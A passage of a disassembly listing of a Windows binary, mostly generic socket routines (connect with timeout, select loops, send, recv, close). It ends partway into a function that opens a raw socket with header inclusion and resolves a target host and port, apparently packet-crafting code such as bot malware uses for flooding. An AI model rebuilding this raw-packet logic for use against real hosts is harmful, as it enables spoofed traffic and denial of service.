jmp short locret_404D4B
; ---------------------------------------------------------------------------
loc_404D39: ; CODE XREF: sub_404D10+23�j
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
mov [eax], ecx
mov eax, [ebp+var_4]
and dword ptr [eax+4], 0
mov eax, [ebp+var_4]
locret_404D4B: ; CODE XREF: sub_404D10+F�j
; sub_404D10+27�j
leave
retn
sub_404D10 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404D4D proc near ; CODE XREF: sub_41349C+417�p
; sub_4143B0+109�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
mov ecx, [ebp+arg_4]
mov eax, [eax+4]
cmp eax, [ecx]
jnz short loc_404D6A
push [ebp+arg_0]
call sub_4053B1
pop ecx
xor eax, eax
jmp short loc_404D99
; ---------------------------------------------------------------------------
loc_404D6A: ; CODE XREF: sub_404D4D+E�j
mov eax, [ebp+arg_4]
mov eax, [eax+4]
mov ecx, [ebp+arg_4]
mov edx, [ebp+arg_0]
mov [ecx+eax*4+0Ch], edx
mov eax, [ebp+arg_4]
mov eax, [eax+4]
inc eax
mov ecx, [ebp+arg_4]
mov [ecx+4], eax
mov eax, [ebp+arg_4]
mov ecx, [ebp+arg_4]
mov eax, [eax+4]
xor edx, edx
cmp eax, [ecx]
setnz dl
mov eax, edx
loc_404D99: ; CODE XREF: sub_404D4D+1B�j
pop ebp
retn
sub_404D4D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404D9B proc near ; CODE XREF: sub_41349C+512�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
jmp short loc_404DAC
; ---------------------------------------------------------------------------
loc_404DA5: ; CODE XREF: sub_404D9B:loc_404E18�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_404DAC: ; CODE XREF: sub_404D9B+8�j
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_4]
cmp ecx, [eax+4]
jnb short locret_404E1A
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_4]
mov eax, [ecx+eax*4+0Ch]
cmp eax, [ebp+arg_0]
jnz short loc_404E18
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_4]
cmp ecx, [eax+8]
jb short loc_404DDE
mov eax, [ebp+arg_4]
mov eax, [eax+8]
dec eax
mov ecx, [ebp+arg_4]
mov [ecx+8], eax
loc_404DDE: ; CODE XREF: sub_404D9B+34�j
mov eax, [ebp+arg_4]
mov eax, [eax+4]
sub eax, [ebp+var_4]
shl eax, 2
push eax
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_4]
lea eax, [ecx+eax*4+10h]
push eax
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_4]
lea eax, [ecx+eax*4+0Ch]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+arg_4]
mov eax, [eax+4]
dec eax
mov ecx, [ebp+arg_4]
mov [ecx+4], eax
jmp short locret_404E1A
; ---------------------------------------------------------------------------
loc_404E18: ; CODE XREF: sub_404D9B+29�j
jmp short loc_404DA5
; ---------------------------------------------------------------------------
locret_404E1A: ; CODE XREF: sub_404D9B+1A�j
; sub_404D9B+7B�j
leave
retn
sub_404D9B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404E1C proc near ; CODE XREF: sub_41349C+45F�p
; sub_4143B0+14E�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
push esi
mov eax, [ebp+arg_0]
and dword ptr [eax+8], 0
mov eax, [ebp+arg_0]
and dword ptr [eax+80Ch], 0
and [ebp+var_8], 0
jmp short loc_404E41
; ---------------------------------------------------------------------------
loc_404E3A: ; CODE XREF: sub_404E1C+BD�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_404E41: ; CODE XREF: sub_404E1C+1C�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_8]
cmp ecx, [eax+4]
jnb loc_404EDE
loc_404E50: ; CODE XREF: sub_404E1C+B7�j
and [ebp+var_14], 0
jmp short loc_404E5D
; ---------------------------------------------------------------------------
loc_404E56: ; CODE XREF: sub_404E1C:loc_404E86�j
mov eax, [ebp+var_14]
inc eax
mov [ebp+var_14], eax
loc_404E5D: ; CODE XREF: sub_404E1C+38�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_14]
cmp ecx, [eax+80Ch]
jnb short loc_404E88
mov eax, [ebp+var_14]
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_8]
mov esi, [ebp+arg_0]
mov eax, [ecx+eax*4+810h]
cmp eax, [esi+edx*4+0Ch]
jnz short loc_404E86
jmp short loc_404E88
; ---------------------------------------------------------------------------
loc_404E86: ; CODE XREF: sub_404E1C+66�j
jmp short loc_404E56
; ---------------------------------------------------------------------------
loc_404E88: ; CODE XREF: sub_404E1C+4D�j
; sub_404E1C+68�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_14]
cmp ecx, [eax+80Ch]
jnz short loc_404ECF
mov eax, [ebp+arg_0]
cmp dword ptr [eax+80Ch], 200h
jnb short loc_404ECF
mov eax, [ebp+var_14]
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_8]
mov esi, [ebp+arg_0]
mov edx, [esi+edx*4+0Ch]
mov [ecx+eax*4+810h], edx
mov eax, [ebp+arg_0]
mov eax, [eax+80Ch]
inc eax
mov ecx, [ebp+arg_0]
mov [ecx+80Ch], eax
loc_404ECF: ; CODE XREF: sub_404E1C+78�j
; sub_404E1C+87�j
xor eax, eax
test eax, eax
jnz loc_404E50
jmp loc_404E3A
; ---------------------------------------------------------------------------
loc_404EDE: ; CODE XREF: sub_404E1C+2E�j
and [ebp+var_10], 0
mov [ebp+var_C], 3E8h
lea eax, [ebp+var_10]
push eax
push 0
mov eax, [ebp+arg_0]
add eax, 80Ch
push eax
push 0
push 0
call ds:dword_41722C ; select
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_404F1A
cmp [ebp+var_4], 0FFFFFFFFh
jz short loc_404F1A
mov [ebp+var_18], 1
jmp short loc_404F1E
; ---------------------------------------------------------------------------
loc_404F1A: ; CODE XREF: sub_404E1C+ED�j
; sub_404E1C+F3�j
and [ebp+var_18], 0
loc_404F1E: ; CODE XREF: sub_404E1C+FC�j
mov eax, [ebp+var_18]
pop esi
leave
retn
sub_404E1C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404F24 proc near ; CODE XREF: sub_41349C+470�p
; sub_4143B0+16D�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
mov eax, [eax+8]
mov [ebp+var_4], eax
jmp short loc_404F3A
; ---------------------------------------------------------------------------
loc_404F33: ; CODE XREF: sub_404F24:loc_404F77�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_404F3A: ; CODE XREF: sub_404F24+D�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_4]
cmp ecx, [eax+4]
jnb short loc_404F79
mov eax, [ebp+arg_0]
add eax, 80Ch
push eax
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
push dword ptr [ecx+eax*4+0Ch]
call sub_416E30 ; __WSAFDIsSet
test eax, eax
jz short loc_404F77
mov eax, [ebp+var_4]
inc eax
mov ecx, [ebp+arg_0]
mov [ecx+8], eax
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
mov eax, [ecx+eax*4+0Ch]
jmp short locret_404F7B
; ---------------------------------------------------------------------------
loc_404F77: ; CODE XREF: sub_404F24+3B�j
jmp short loc_404F33
; ---------------------------------------------------------------------------
loc_404F79: ; CODE XREF: sub_404F24+1F�j
xor eax, eax
locret_404F7B: ; CODE XREF: sub_404F24+51�j
leave
retn
sub_404F24 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404F7D proc near ; CODE XREF: sub_404FD0+6�p
; sub_41349C+59C�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
jmp short loc_404F8E
; ---------------------------------------------------------------------------
loc_404F87: ; CODE XREF: sub_404F7D+37�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_404F8E: ; CODE XREF: sub_404F7D+8�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_4]
cmp ecx, [eax+4]
jnb short loc_404FB6
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
push dword ptr [ecx+eax*4+0Ch]
call sub_4053B1
pop ecx
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
and dword ptr [ecx+eax*4+0Ch], 0
jmp short loc_404F87
; ---------------------------------------------------------------------------
loc_404FB6: ; CODE XREF: sub_404F7D+1A�j
mov eax, [ebp+arg_0]
and dword ptr [eax+4], 0
mov eax, [ebp+arg_0]
and dword ptr [eax+8], 0
mov eax, [ebp+arg_0]
and dword ptr [eax+80Ch], 0
leave
retn
sub_404F7D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404FD0 proc near ; CODE XREF: sub_41349C+5FB�p
; sub_4143B0+238�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push [ebp+arg_0]
call sub_404F7D
pop ecx
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
pop ebp
retn
sub_404FD0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404FE7 proc near ; CODE XREF: sub_412BC9+11�p
; sub_41349C+40E�p ...
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = byte ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 2Ch
push 20h
push 0
lea eax, [ebp+var_24]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov eax, [ebp+arg_8]
and eax, 2
test eax, eax
jz short loc_405010
mov [ebp+var_20], 17h
jmp short loc_405027
; ---------------------------------------------------------------------------
loc_405010: ; CODE XREF: sub_404FE7+1E�j
mov eax, [ebp+arg_8]
and eax, 1
test eax, eax
jz short loc_405023
mov [ebp+var_20], 2
jmp short loc_405027
; ---------------------------------------------------------------------------
loc_405023: ; CODE XREF: sub_404FE7+31�j
and [ebp+var_20], 0
loc_405027: ; CODE XREF: sub_404FE7+27�j
; sub_404FE7+3A�j
mov eax, [ebp+arg_8]
and eax, 4
xor ecx, ecx
test eax, eax
setnz cl
inc ecx
mov [ebp+var_1C], ecx
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_24]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call dword_41DE84 ; getaddrinfo
test eax, eax
jz short loc_405057
xor eax, eax
jmp locret_4050E8
; ---------------------------------------------------------------------------
loc_405057: ; CODE XREF: sub_404FE7+67�j
mov eax, [ebp+var_28]
mov [ebp+var_4], eax
jmp short loc_405068
; ---------------------------------------------------------------------------
loc_40505F: ; CODE XREF: sub_404FE7+A8�j
; sub_404FE7+F4�j
mov eax, [ebp+var_4]
mov eax, [eax+1Ch]
mov [ebp+var_4], eax
loc_405068: ; CODE XREF: sub_404FE7+76�j
cmp [ebp+var_4], 0
jz short loc_4050DD
mov eax, [ebp+var_4]
push dword ptr [eax+0Ch]
mov eax, [ebp+var_4]
push dword ptr [eax+8]
mov eax, [ebp+var_4]
push dword ptr [eax+4]
call ds:dword_417218 ; socket
mov [ebp+var_2C], eax
cmp [ebp+var_2C], 0FFFFFFFFh
jnz short loc_405091
jmp short loc_40505F
; ---------------------------------------------------------------------------
loc_405091: ; CODE XREF: sub_404FE7+A6�j
push 0
push [ebp+var_2C]
call sub_404457
pop ecx
pop ecx
mov eax, [ebp+var_4]
push dword ptr [eax+10h]
mov eax, [ebp+var_4]
push dword ptr [eax+18h]
push [ebp+var_2C]
call ds:dword_4171F4 ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_4050D2
call ds:dword_417224 ; WSAGetLastError
cmp eax, 2733h
jnz short loc_4050D2
push [ebp+var_28]
call dword_41DE8C ; freeaddrinfo
mov eax, [ebp+var_2C]
jmp short locret_4050E8
; ---------------------------------------------------------------------------
loc_4050D2: ; CODE XREF: sub_404FE7+CE�j
; sub_404FE7+DB�j
push [ebp+var_2C]
call sub_4053B1
pop ecx
jmp short loc_40505F
; ---------------------------------------------------------------------------
loc_4050DD: ; CODE XREF: sub_404FE7+85�j
push [ebp+var_28]
call dword_41DE8C ; freeaddrinfo
xor eax, eax
locret_4050E8: ; CODE XREF: sub_404FE7+6B�j
; sub_404FE7+E9�j
leave
retn
sub_404FE7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4050EA proc near ; CODE XREF: sub_401E38+80�p
; sub_402698+16�p ...
var_844 = dword ptr -844h
var_840 = dword ptr -840h
var_83C = dword ptr -83Ch
var_838 = dword ptr -838h
var_834 = dword ptr -834h
var_830 = dword ptr -830h
var_82C = dword ptr -82Ch
var_828 = dword ptr -828h
var_824 = dword ptr -824h
var_820 = dword ptr -820h
var_24 = byte ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 844h
mov eax, [ebp+arg_C]
cdq
mov ecx, 3E8h
idiv ecx
mov [ebp+var_834], eax
mov eax, [ebp+arg_C]
cdq
mov ecx, 3E8h
idiv ecx
imul edx, 3E8h
mov [ebp+var_830], edx
push 20h
push 0
lea eax, [ebp+var_24]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov eax, [ebp+arg_8]
and eax, 2
test eax, eax
jz short loc_40513E
mov [ebp+var_20], 17h
jmp short loc_405155
; ---------------------------------------------------------------------------
loc_40513E: ; CODE XREF: sub_4050EA+49�j
mov eax, [ebp+arg_8]
and eax, 1
test eax, eax
jz short loc_405151
mov [ebp+var_20], 2
jmp short loc_405155
; ---------------------------------------------------------------------------
loc_405151: ; CODE XREF: sub_4050EA+5C�j
and [ebp+var_20], 0
loc_405155: ; CODE XREF: sub_4050EA+52�j
; sub_4050EA+65�j
mov eax, [ebp+arg_8]
and eax, 4
xor ecx, ecx
test eax, eax
setnz cl
inc ecx
mov [ebp+var_1C], ecx
lea eax, [ebp+var_82C]
push eax
lea eax, [ebp+var_24]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call dword_41DE84 ; getaddrinfo
test eax, eax
jz short loc_405188
xor eax, eax
jmp locret_40538B
; ---------------------------------------------------------------------------
loc_405188: ; CODE XREF: sub_4050EA+95�j
mov eax, [ebp+var_82C]
mov [ebp+var_4], eax
jmp short loc_40519C
; ---------------------------------------------------------------------------
loc_405193: ; CODE XREF: sub_4050EA+E3�j
; sub_4050EA+128�j ...
mov eax, [ebp+var_4]
mov eax, [eax+1Ch]
mov [ebp+var_4], eax
loc_40519C: ; CODE XREF: sub_4050EA+A7�j
cmp [ebp+var_4], 0
jz loc_40537D
mov eax, [ebp+var_4]
push dword ptr [eax+0Ch]
mov eax, [ebp+var_4]
push dword ptr [eax+8]
mov eax, [ebp+var_4]
push dword ptr [eax+4]
call ds:dword_417218 ; socket
mov [ebp+var_83C], eax
cmp [ebp+var_83C], 0FFFFFFFFh
jnz short loc_4051CF
jmp short loc_405193
; ---------------------------------------------------------------------------
loc_4051CF: ; CODE XREF: sub_4050EA+E1�j
push 0
push [ebp+var_83C]
call sub_404457
pop ecx
pop ecx
mov eax, [ebp+var_4]
push dword ptr [eax+10h]
mov eax, [ebp+var_4]
push dword ptr [eax+18h]
push [ebp+var_83C]
call ds:dword_4171F4 ; connect
mov [ebp+var_838], eax
cmp [ebp+var_838], 0
jz short loc_405217
call ds:dword_417224 ; WSAGetLastError
cmp eax, 2733h
jz short loc_405217
jmp loc_405193
; ---------------------------------------------------------------------------
loc_405217: ; CODE XREF: sub_4050EA+119�j
; sub_4050EA+126�j
and [ebp+var_828], 0
loc_40521E: ; CODE XREF: sub_4050EA+1AF�j
and [ebp+var_840], 0
jmp short loc_405234
; ---------------------------------------------------------------------------
loc_405227: ; CODE XREF: sub_4050EA:loc_405259�j
mov eax, [ebp+var_840]
inc eax
mov [ebp+var_840], eax
loc_405234: ; CODE XREF: sub_4050EA+13B�j
mov eax, [ebp+var_840]
cmp eax, [ebp+var_828]
jnb short loc_40525B
mov eax, [ebp+var_840]
mov eax, [ebp+eax*4+var_824]
cmp eax, [ebp+var_83C]
jnz short loc_405259
jmp short loc_40525B
; ---------------------------------------------------------------------------
loc_405259: ; CODE XREF: sub_4050EA+16B�j
jmp short loc_405227
; ---------------------------------------------------------------------------
loc_40525B: ; CODE XREF: sub_4050EA+156�j
; sub_4050EA+16D�j
mov eax, [ebp+var_840]
cmp eax, [ebp+var_828]
jnz short loc_405295
cmp [ebp+var_828], 200h
jnb short loc_405295
mov eax, [ebp+var_840]
mov ecx, [ebp+var_83C]
mov [ebp+eax*4+var_824], ecx
mov eax, [ebp+var_828]
inc eax
mov [ebp+var_828], eax
loc_405295: ; CODE XREF: sub_4050EA+17D�j
; sub_4050EA+189�j
xor eax, eax
test eax, eax
jnz short loc_40521E
lea eax, [ebp+var_834]
push eax
push 0
lea eax, [ebp+var_828]
push eax
push 0
push 0
call ds:dword_41722C ; select
cmp eax, 1
jnz short loc_4052E0
push 1
push [ebp+var_83C]
call sub_404457
pop ecx
pop ecx
push [ebp+var_82C]
call dword_41DE8C ; freeaddrinfo
mov eax, [ebp+var_83C]
jmp locret_40538B
; ---------------------------------------------------------------------------
loc_4052E0: ; CODE XREF: sub_4050EA+1CE�j
; sub_4050EA+27C�j
and [ebp+var_844], 0
jmp short loc_4052F6
; ---------------------------------------------------------------------------
loc_4052E9: ; CODE XREF: sub_4050EA:loc_405360�j
mov eax, [ebp+var_844]
inc eax
mov [ebp+var_844], eax
loc_4052F6: ; CODE XREF: sub_4050EA+1FD�j
mov eax, [ebp+var_844]
cmp eax, [ebp+var_828]
jnb short loc_405362
mov eax, [ebp+var_844]
mov eax, [ebp+eax*4+var_824]
cmp eax, [ebp+var_83C]
jnz short loc_405360
loc_405319: ; CODE XREF: sub_4050EA+265�j
mov eax, [ebp+var_828]
dec eax
cmp [ebp+var_844], eax
jnb short loc_405351
mov eax, [ebp+var_844]
mov ecx, [ebp+var_844]
mov ecx, [ebp+ecx*4+var_820]
mov [ebp+eax*4+var_824], ecx
mov eax, [ebp+var_844]
inc eax
mov [ebp+var_844], eax
jmp short loc_405319
; ---------------------------------------------------------------------------
loc_405351: ; CODE XREF: sub_4050EA+23C�j
mov eax, [ebp+var_828]
dec eax
mov [ebp+var_828], eax
jmp short loc_405362
; ---------------------------------------------------------------------------
loc_405360: ; CODE XREF: sub_4050EA+22D�j
jmp short loc_4052E9
; ---------------------------------------------------------------------------
loc_405362: ; CODE XREF: sub_4050EA+218�j
; sub_4050EA+274�j
xor eax, eax
test eax, eax
jnz loc_4052E0
push [ebp+var_83C]
call sub_4053B1
pop ecx
jmp loc_405193
; ---------------------------------------------------------------------------
loc_40537D: ; CODE XREF: sub_4050EA+B6�j
push [ebp+var_82C]
call dword_41DE8C ; freeaddrinfo
xor eax, eax
locret_40538B: ; CODE XREF: sub_4050EA+99�j
; sub_4050EA+1F1�j
leave
retn
sub_4050EA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40538D proc near ; CODE XREF: sub_401E38+26E�p
; sub_4020C2+3FB�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 1
push [ebp+arg_0]
call ds:dword_417200 ; shutdown
push 3E8h
call ds:dword_41709C ; Sleep
push [ebp+arg_0]
call sub_4053B1
pop ecx
pop ebp
retn
sub_40538D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4053B1 proc near ; CODE XREF: sub_404279+77�p
; sub_40432E+1C�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push [ebp+arg_0]
call ds:dword_417230 ; closesocket
pop ebp
retn
sub_4053B1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4053BF proc near ; CODE XREF: sub_401E38+15C�p
; sub_4020C2+2F9�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push 0
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_41720C ; send
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
leave
retn
sub_4053BF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4053DC proc near ; CODE XREF: sub_403DF3+D1�p
; sub_405443+21�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_8], 2
jnb short loc_4053F6
push 271Eh
call ds:dword_417234 ; WSASetLastError
or eax, 0FFFFFFFFh
jmp short locret_405441
; ---------------------------------------------------------------------------
loc_4053F6: ; CODE XREF: sub_4053DC+8�j
push 0
mov eax, [ebp+arg_8]
dec eax
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_417248 ; recv
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_405418
cmp [ebp+var_4], 0FFFFFFFFh
jnz short loc_40541D
loc_405418: ; CODE XREF: sub_4053DC+34�j
mov eax, [ebp+var_4]
jmp short locret_405441
; ---------------------------------------------------------------------------
loc_40541D: ; CODE XREF: sub_4053DC+3A�j
mov eax, [ebp+var_4]
cmp eax, [ebp+arg_8]
jb short loc_405435
push 271Eh
call ds:dword_417234 ; WSASetLastError
or eax, 0FFFFFFFFh
jmp short locret_405441
; ---------------------------------------------------------------------------
loc_405435: ; CODE XREF: sub_4053DC+47�j
mov eax, [ebp+arg_4]
add eax, [ebp+var_4]
and byte ptr [eax], 0
mov eax, [ebp+var_4]
locret_405441: ; CODE XREF: sub_4053DC+18�j
; sub_4053DC+3F�j ...
leave
retn
sub_4053DC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405443 proc near ; CODE XREF: sub_402698+8D�p
; sub_402698+2BE�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push [ebp+arg_C]
push [ebp+arg_0]
call sub_40546E
pop ecx
pop ecx
test eax, eax
jnz short loc_40545B
xor eax, eax
jmp short loc_40546C
; ---------------------------------------------------------------------------
loc_40545B: ; CODE XREF: sub_405443+12�j
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4053DC
add esp, 0Ch
loc_40546C: ; CODE XREF: sub_405443+16�j
pop ebp
retn
sub_405443 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40546E proc near ; CODE XREF: sub_405443+9�p
; sub_410649+2D�p ...
var_1018 = dword ptr -1018h
var_1014 = dword ptr -1014h
var_1010 = dword ptr -1010h
var_100C = dword ptr -100Ch
var_1008 = dword ptr -1008h
var_1004 = dword ptr -1004h
var_804 = dword ptr -804h
var_800 = dword ptr -800h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 1018h
call sub_416BC0
and [ebp+var_804], 0
and [ebp+var_1008], 0
loc_405489: ; CODE XREF: sub_40546E+90�j
and [ebp+var_1014], 0
jmp short loc_40549F
; ---------------------------------------------------------------------------
loc_405492: ; CODE XREF: sub_40546E:loc_4054C1�j
mov eax, [ebp+var_1014]
inc eax
mov [ebp+var_1014], eax
loc_40549F: ; CODE XREF: sub_40546E+22�j
mov eax, [ebp+var_1014]
cmp eax, [ebp+var_804]
jnb short loc_4054C3
mov eax, [ebp+var_1014]
mov eax, [ebp+eax*4+var_800]
cmp eax, [ebp+arg_0]
jnz short loc_4054C1
jmp short loc_4054C3
; ---------------------------------------------------------------------------
loc_4054C1: ; CODE XREF: sub_40546E+4F�j
jmp short loc_405492
; ---------------------------------------------------------------------------
loc_4054C3: ; CODE XREF: sub_40546E+3D�j
; sub_40546E+51�j
mov eax, [ebp+var_1014]
cmp eax, [ebp+var_804]
jnz short loc_4054FA
cmp [ebp+var_804], 200h
jnb short loc_4054FA
mov eax, [ebp+var_1014]
mov ecx, [ebp+arg_0]
mov [ebp+eax*4+var_800], ecx
mov eax, [ebp+var_804]
inc eax
mov [ebp+var_804], eax
loc_4054FA: ; CODE XREF: sub_40546E+61�j
; sub_40546E+6D�j
xor eax, eax
test eax, eax
jnz short loc_405489
loc_405500: ; CODE XREF: sub_40546E+107�j
and [ebp+var_1018], 0
jmp short loc_405516
; ---------------------------------------------------------------------------
loc_405509: ; CODE XREF: sub_40546E:loc_405538�j
mov eax, [ebp+var_1018]
inc eax
mov [ebp+var_1018], eax
loc_405516: ; CODE XREF: sub_40546E+99�j
mov eax, [ebp+var_1018]
cmp eax, [ebp+var_1008]
jnb short loc_40553A
mov eax, [ebp+var_1018]
mov eax, [ebp+eax*4+var_1004]
cmp eax, [ebp+arg_0]
jnz short loc_405538
jmp short loc_40553A
; ---------------------------------------------------------------------------
loc_405538: ; CODE XREF: sub_40546E+C6�j
jmp short loc_405509
; ---------------------------------------------------------------------------
loc_40553A: ; CODE XREF: sub_40546E+B4�j
; sub_40546E+C8�j
mov eax, [ebp+var_1018]
cmp eax, [ebp+var_1008]
jnz short loc_405571
cmp [ebp+var_1008], 200h
jnb short loc_405571
mov eax, [ebp+var_1018]
mov ecx, [ebp+arg_0]
mov [ebp+eax*4+var_1004], ecx
mov eax, [ebp+var_1008]
inc eax
mov [ebp+var_1008], eax
loc_405571: ; CODE XREF: sub_40546E+D8�j
; sub_40546E+E4�j
xor eax, eax
test eax, eax
jnz short loc_405500
mov eax, [ebp+arg_4]
xor edx, edx
mov ecx, 3E8h
div ecx
mov [ebp+var_1010], eax
mov eax, [ebp+arg_4]
xor edx, edx
mov ecx, 3E8h
div ecx
imul edx, 3E8h
mov [ebp+var_100C], edx
lea eax, [ebp+var_1010]
push eax
lea eax, [ebp+var_1008]
push eax
push 0
lea eax, [ebp+var_804]
push eax
push 1
call ds:dword_41722C ; select
cmp eax, 1
jz short loc_4055C9
xor eax, eax
jmp short locret_4055E3
; ---------------------------------------------------------------------------
loc_4055C9: ; CODE XREF: sub_40546E+155�j
lea eax, [ebp+var_804]
push eax
push [ebp+arg_0]
call sub_416E30 ; __WSAFDIsSet
test eax, eax
jz short loc_4055E1
push 1
pop eax
jmp short locret_4055E3
; ---------------------------------------------------------------------------
loc_4055E1: ; CODE XREF: sub_40546E+16C�j
xor eax, eax
locret_4055E3: ; CODE XREF: sub_40546E+159�j
; sub_40546E+171�j
leave
retn
sub_40546E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4055E5 proc near ; DATA XREF: sub_405E45+113�o
var_1358 = dword ptr -1358h
var_1354 = dword ptr -1354h
var_1350 = dword ptr -1350h
var_134C = dword ptr -134Ch
var_1348 = dword ptr -1348h
var_1344 = dword ptr -1344h
var_1340 = dword ptr -1340h
var_133C = dword ptr -133Ch
var_1338 = dword ptr -1338h
var_1334 = dword ptr -1334h
var_118D = byte ptr -118Dh
var_108D = byte ptr -108Dh
var_1087 = dword ptr -1087h
var_1083 = dword ptr -1083h
var_107F = dword ptr -107Fh
var_1078 = dword ptr -1078h
var_1074 = byte ptr -1074h
var_1058 = byte ptr -1058h
var_14 = dword ptr -14h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1358h
call sub_416BC0
push 2B9h
push [ebp+arg_0]
lea eax, [ebp+var_1334]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
push 0FFh
push 3
push 2
call ds:dword_417218 ; socket
mov [ebp+var_1078], eax
cmp [ebp+var_1078], 0FFFFFFFFh
jnz short loc_405643
push [ebp+var_1334]
call sub_409763
pop ecx
xor eax, eax
jmp locret_405E41
; ---------------------------------------------------------------------------
loc_405643: ; CODE XREF: sub_4055E5+49�j
mov [ebp+var_1340], 1
push 4
lea eax, [ebp+var_1340]
push eax
push 2
push 0
push [ebp+var_1078]
call ds:dword_417204 ; setsockopt
cmp eax, 0FFFFFFFFh
jnz short loc_40567E
push [ebp+var_1334]
call sub_409763
pop ecx
xor eax, eax
jmp locret_405E41
; ---------------------------------------------------------------------------
loc_40567E: ; CODE XREF: sub_4055E5+84�j
push 0
push [ebp+var_1078]
call sub_404457
pop ecx
pop ecx
push 10h
push 0
lea eax, [ebp+var_10]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov [ebp+var_10], 2
lea eax, [ebp+var_108D]
push eax
call sub_416B9C ; atoi
pop ecx
push eax
call ds:dword_417238 ; htons
mov [ebp+var_E], ax
lea eax, [ebp+var_118D]
push eax
call ds:dword_417244 ; inet_addr
mov [ebp+var_C], eax
cmp [ebp+var_C], 0FFFFFFFFh
jnz short loc_405710
lea eax, [ebp+var_118D]
push eax
call ds:dword_41723C ; gethostbyname
mov [ebp+var_1344], eax
cmp [ebp+var_1344], 0
jnz short loc_405700
push [ebp+var_1334]
call sub_409763
